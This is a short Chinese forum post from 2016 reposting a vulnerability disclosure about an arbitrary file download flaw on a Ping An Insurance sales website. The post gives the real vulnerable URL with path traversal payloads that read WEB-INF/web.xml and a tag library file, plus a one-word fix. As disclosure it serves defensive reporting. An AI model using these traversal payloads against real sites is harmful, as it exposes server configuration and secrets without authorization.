HanDs
NO.2

[7月漏洞公开] 平安保险某重要站点存在部分文件下载漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

任意文件下载漏洞

详细说明:

中国平安官方直销网站http://www.4008000000.com/

QQ截图20160526155249.png





问题地址:

http://www.4008000000.com/downLoad.jsp?filename=../../../WEB-INF/web.xml

QQ截图20160526155139.png

漏洞证明:

http://www.4008000000.com/downLoad.jsp?filename=../../../WEB-INF/tlds/fmt.tld

QQ截图20160526155716.png



修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
平安 保险 重要 站点 存在 部分 文件下载 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组